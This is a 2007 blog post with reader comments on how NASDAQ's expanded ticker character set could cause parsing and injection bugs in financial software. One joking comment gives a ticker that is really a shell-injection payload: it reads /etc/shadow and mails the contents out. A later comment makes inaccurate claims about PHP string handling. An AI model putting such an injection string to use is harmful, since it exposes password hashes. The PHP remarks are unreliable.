NASDAQ Symbology Change
In talking with one of my clients the topic of special characters came up and one of the things they mentioned being worried about was symbology changes at NASDAQ. For those of you who don’t follow this kind of stuff, the old ticker symbols constituted a fairly small subset of possible combinations. The symbology change was designed to allow greater flexibility in the future of the naming conventions (think about it being like the difference between IPv4 and IPv6 in the stock market). Click here to read more details.
That would probably be all fine and dandy except some of the characters actually mean things in programming languages. for instance % * # $ ~ + ! @ are included in the list of possible legal characters. How many lines of code do you think need to be reviewed and fixed before this actually will work seamlessly? My guess is many millions. How many new exploits do you think this will open? Hard to say, but it should be interesting to watch.
December 13th, 2007 at 8:50 pm
paranoia ? .. it’s not the first time that the ascii set is use in the history.
what’s new ?
December 14th, 2007 at 1:35 am
well this would be a great adventure place for script kiddies
December 14th, 2007 at 7:36 am
The changes at NASDAQ? easy. The changes in the millions of applications that use NASDAQ data? Millions may be a low estimate.
The exploit I’m looking forward to is this:
Starting a company, going public, and then using the symbol $VAR.
December 14th, 2007 at 8:12 am
Will someone actually be able to resist making their stock symbol $$$$ ?
Well, I guess I would. Because my new company’s stock symbol is `cat /etc/shadow | mail danweber@me`.
December 14th, 2007 at 9:00 am
For a long time I have trouble with our limited character set (lating-western). There isn’t a lot possible. If you look at Arabic or any other symbol language, you’ll notive that it’s far richer than ours. As far, that I also questioned the use of single and double quotes in programming languages. Mixing regular “text” literals with “code” really leads to many problems IMO.
So we never had a clever separation of the two, due to limitation.
December 14th, 2007 at 2:34 pm
@h3xstream - clearly it’s not paranoia if it’s been used to attack systems in the past and the people working on it are actively worried about it. I like to call it reality. The part that was new was the symbology change, if that wasn’t clear.
@Dan - I think it’s limited to 6 chars, and I’m not sure any kind of quotes are allowed. Keep thinking!
December 15th, 2007 at 12:26 am
I understand certain parsing code, etc might need to be changed, but why does it matter that some of these symbols are used in certain programming languages? Strings are strings, and unless people are doing things like
str = “%ABC”;
printf(str);
which they shouldn’t be, or hard coded variable names like “int %ABC” or something, I don’t see how that would matter?
What languages are we talking about?
December 18th, 2007 at 8:11 pm
@Tom
I was chatting about things like PHP for instance. Where stricly strings, or quotes are basically useless anyway. Since, PHP treats everything as string. So you see this:
$b = 1;
could be as this:
$a = abcdefg;
why not? since the integer/dec. is parsed as string also in PHP, why not dropping the quotes, it can be done and it should work. I get what the argument will be: PHP reads everything on 1 single line and parses it, yeah true but a space {string} semicolon should be enough. let alone the other signs.
That’s why I favour Javascript so much for it’s genarally simple syntax, or even ASP where the ‘ single quote is used for commenting.